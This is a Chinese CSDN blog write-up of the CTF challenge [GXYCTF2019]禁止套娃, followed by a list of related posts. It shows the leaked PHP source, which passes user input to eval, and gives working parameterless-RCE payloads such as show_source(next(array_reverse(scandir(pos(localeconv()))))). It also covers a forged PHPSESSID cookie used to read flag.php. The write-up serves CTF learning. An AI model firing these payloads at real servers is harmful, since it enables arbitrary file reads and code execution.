java套娃_[GXYCTF2019]禁止套娃

最新推荐文章于 2024-01-29 23:36:17 发布
最新推荐文章于 2024-01-29 23:36:17 发布
阅读量115 收藏
点赞数
文章标签: java套娃
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39701768/article/details/114473458
版权

0x00 知识点

无参数RCE

eval($_GET['exp']);

1.利用超全局变量进行bypass,进行RCE 2.进行任意文件读取

形式:

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}

也就是说 正则匹配了一些关键字比如et导致很多函数不能用,getshell什么的基本不可能。

该正则,正是我们说的无参数函数的校验,其只允许执行如下格式函数

a(b(c()));

a();

但不允许

a('123');

0x01解题

打开题目啥也没有,啥都试试吧。。 这里如果你扫描目录工具最够强大可以扫出来/.git

8906b6b372db1c9222e699abc23e06a8.png

得到源码:

include "flag.php";

echo "flag在哪里呢?
";

if(isset($_GET['exp'])){

if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {

if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {

// echo $_GET['exp'];

@eval($_GET['exp']);

}

else{

die("还差一点哦!");

}

}

else{

die("再好好想想!");

}

}

else{

die("还想读flag,臭弟弟!");

}

}

// highlight_file(__FILE__);

?>

分析源码:

1.需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的内容。

2.过滤了常用的几个伪协议,不能以伪协议读取文件。

3.(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。

4.正则匹配掉了et/na/info等关键字,很多函数都用不了。

5:eval($_GET['exp']); 典型的无参数RCE

既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取

首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如:

print_r(scandir('.'));

?>

那么问题就是如何构造 scandir('.') 这里再看函数:

localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点:

current(localeconv())永远都是个点

b3253fb19073789e513d1a89a8d50855.png

那么我们第一步就解决了:

print_r(scandir(current(localeconv())));

print_r(scandir(pos(localeconv())));

c8c5c4809ec795336f8dba569c2ca88d.png

现在的问题就是怎么读取倒数第二个数组呢? 看手册:

f245497b747842dda92f7c107bbd3d37.png

很明显,我们不能直接得到倒数第二组中的内容: 三种方法: 1.array_reverse() 以相反的元素顺序返回数组

?exp=print_r(array_reverse(scandir(current(localeconv()))));

2.array_rand(array_flip())

array_flip()交换数组的键和值

?exp=print_r(array_flip(scandir(current(localeconv()))));

array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回,本题目中scandir()返回的数组只有5个元素,刷新几次就能刷出来flag.php

?exp=print_r(array_rand(array_flip(scandir(current(localeconv())))));

3.session_id(session_start())

本题目虽然ban了hex关键字,导致hex2bin()被禁用,但是我们可以并不依赖于十六进制转ASCII的方式,因为flag.php这些字符是PHPSESSID本身就支持的。 使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。 session_id()可以获取到当前的session id。

因此我们手动设置名为PHPSESSID的cookie,并设置值为flag.php

16bf98aa0e01caa15cc8576e2ebadc8a.png

d97b74e59c5db416e14a104699e60e21.png

那么我们最后一个问题:

如何读flag.php的源码

因为et被ban了,所以不能使用file_get_contents(),但是可以可以使用readfile()或highlight_file()以及其别名函数show_source()

view-source:http://172.21.4.12:10031/?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv()))))));

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

?exp=show_source(session_id(session_start()));

得到flag 参考链接:

weixin_39701768
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019]禁止套娃(.git泄露,无参RCE)
xlcvv的博客
04-17 3347
这里fuzz了一下,已经确认是源码泄露了,因为都没什么线索了,但是这问题就来了,用dirsearch扫的话,就会因为访问次数过快,导致扫描不出来,啊,那就瞄一下师傅们的wp叭! .git源码泄露,用GitHack拿到index.php: 看到了eval($_GET['exp']),就是一句话木马的GET方式,题目又加了好多过滤限制了REC,这就考验做题者的积累了(我小白积累太少了)。 看代码,第...
【学习笔记3】buu [GXYCTF2019]禁止套娃
weixin_43553654的博客
05-08 338
知识点:1. /.git泄露2.无参数RCE3.各种php函数的使用解题 首先登录进去后发现什么都没有,查看源码,抓包也什么都没信息,去瞄了一眼大佬的wp知道了这是.git文件泄露从而导致的源码的泄露,不过别人是用扫描器跑出来的,可是我试了一试,因为我请求的次数太多,什么都没有跑出来。不过知道后就可以用Githack脚本跑了,这个脚本是python2环境,可以放在kali下跑,命令就是p...
2022d3CTF 部分web题基础知识学习
weixin_51458899的博客
03-23 4123
[d3ctf2020]shorter rome1.0反序列化链调试见上面(第三周标题为[d3ctf2020]的内容) 当时参考的资料: ROME反序列化分析 (c014.cn) javassist使用全解析 - rickiyang - 博客园 (cnblogs.com) https://xz.aliyun.com/t/6787#toc-8 (java反射入门) https://developer.huawei.com/consumer/cn/forum/topic/020447303398723010
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2468
BUUCTF记录贴
[GXYCTF2019]禁止套娃
pakho_C的博客
02-26 5598
web第37题 [GXYCTF2019]禁止套娃 打开靶场 审计源代码无发现,使用dirmap进行目录扫描 发现.git目录,猜测存在.git源码泄露,参考: CTF-WEB:Git 源码泄露 git文件致源码泄露 使用githack工具下载到.git文件夹下的index.php文件 index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_m
[GXYCTF2019]禁止套娃(特详解)
qq_74806534的博客
01-29 2万+
loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组(换句话说,就是读出当前目录下的文件) rray_reverse()以相反的顺序输出(目的是以正序输出查询出来的内容)然后 next 提取第二个元素(将.过滤出去),最后用highlight_file()给显示出来。localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."。一个合法的表达式也可以是a(b();
套娃_螺旋填充_偏移填充_源码
10-04
激光打标机的填充工具可用于填充指定的2D复合曲线图,并且不同的填充参数的设置对不同材料的加工效果有很大的影响。方向平行剖面线和轮廓平行剖面线是两种基本的剖面线方式。方向平行剖面线,也称为“锯齿形”剖面线...
俄罗斯套娃奖品Java程序
08-12
标题中的“俄罗斯套娃奖品Java程序”表明这是一个使用Java编程语言实现的程序,它可能与俄罗斯套娃这种玩具的概念相结合,创建出一种趣味性的计算模型或者游戏。俄罗斯套娃通常指的是一个大娃娃里面装着小一点的同款...
俄罗斯套娃信封问题(java代码).docx
最新发布
04-13
### 俄罗斯套娃信封问题解析及Java代码实现 #### 问题背景与描述 俄罗斯套娃信封问题是一个经典的计算机科学问题,它涉及到如何找出一组信封中能互相嵌套的最大子序列。在这个问题中,每个信封由其宽度和高度来定义...
俄罗斯套娃问题 回溯法
08-01
在“俄罗斯套娃问题”中,我们通常要考虑如何正确地将一系列大小不一的套娃放入有限的空间内,使得每个套娃都能完全装入另一个更大的套娃之中。 回溯法解决俄罗斯套娃问题的基本步骤如下: 1. **定义状态**:首先...
俄罗斯套娃奖品C++程序
05-19
在IT领域,编程竞赛是一种锻炼和展示编程技巧的常见方式,而“俄罗斯套娃奖品C++程序”就是一个这样的例子,它曾出现在中兴通信公司的“捧月杯”编程竞赛中。这个程序的设计和实现利用了C++这门强大的编程语言,展示...
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1393
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
热门推荐
Sp4rkW的博客
08-21 4万+
原题内容: 地址:http://120.24.86.145:8003/ 怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...
[BUUCTF刷题]禁止套娃
weixin_43952190的博客
07-01 2104
禁止套娃 exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); exp=show_source(session_id(session_start())); 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
PHP 代码注入知识点总结
千寻的博客
02-10 2097
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法 第一章 概述 第一节 原理以及...
php从入门到放弃,代码审计从入门到放弃(三) & phplimit
weixin_39818727的博客
03-11 122
原创:一叶飘零前言本次是phplimit这道题,本篇文章提供了3种解法,即如何利用无参数函数进行RCE/任意文件读取题目概述题目源码如下:if(';'===preg_replace('/[^\W]+\((?R)?\)/','',$_GET['code'])){eval($_GET['code']);}else{show_source(__FILE__);}代码非常清晰,首先preg_repl...
无参数RCE绕过之禁止套娃
qq_58970968的博客
07-10 470
知识点:无参数REC 一般有三种绕过姿势:参考文章:无参数RCE总结_L1am0ur的博客-CSDN博客_无参数rce 1.概念: 无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。 没有参数的函数什么意思?一般该类题目代码如下(或类似): 有三种绕过:这里主要讲session_id(),具体其他方法参考原文章;参考文章绝优秀,思路清晰,知识全面;session_id必须要开启session才可以使用,所以我们要先使用session_start所以组合起来就是:session_id(sessi
[GXYCTF2019]禁止套娃(每日一题)
qq_51684648的博客
09-06 582
[GXYCTF2019]禁止套娃 知识点 .git源码泄露 无参数RCE,参考文章:https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/# 解题思路 1.打开题目,啥也没有,F12也啥都没有,用wscan扫一下目录看看,发现.git返回403,猜测是git源码泄露。 2.使用GitHack下载源码 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xecnj2F2-1630909930492)(https://
生成蓝桥杯中俄罗斯套娃题目的java代码
05-29
好的,以下是一份Java代码,可以解决蓝桥杯中俄罗斯套娃题目: ```java import java.util.*; public class Main { public static void main(String[] args) { Scanner scanner = new Scanner(System.in); int n = scanner.nextInt(); Doll[] dolls = new Doll[n]; for (int i = 0; i < n; i++) { int length = scanner.nextInt(); int width = scanner.nextInt(); dolls[i] = new Doll(length, width); } Arrays.sort(dolls); int[] dp = new int[n]; int max = 0; for (int i = 0; i < n; i++) { dp[i] = 1; for (int j = 0; j < i; j++) { if (dolls[i].length < dolls[j].length && dolls[i].width < dolls[j].width) { dp[i] = Math.max(dp[i], dp[j] + 1); } } max = Math.max(max, dp[i]); } System.out.println(max); } } class Doll implements Comparable<Doll> { int length; int width; public Doll(int length, int width) { this.length = length; this.width = width; } @Override public int compareTo(Doll doll) { if (this.length == doll.length) { return this.width - doll.width; } return this.length - doll.length; } } ``` 这段代码使用了动态规划算法,时间复杂度为 O(n^2),可以通过蓝桥杯的测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值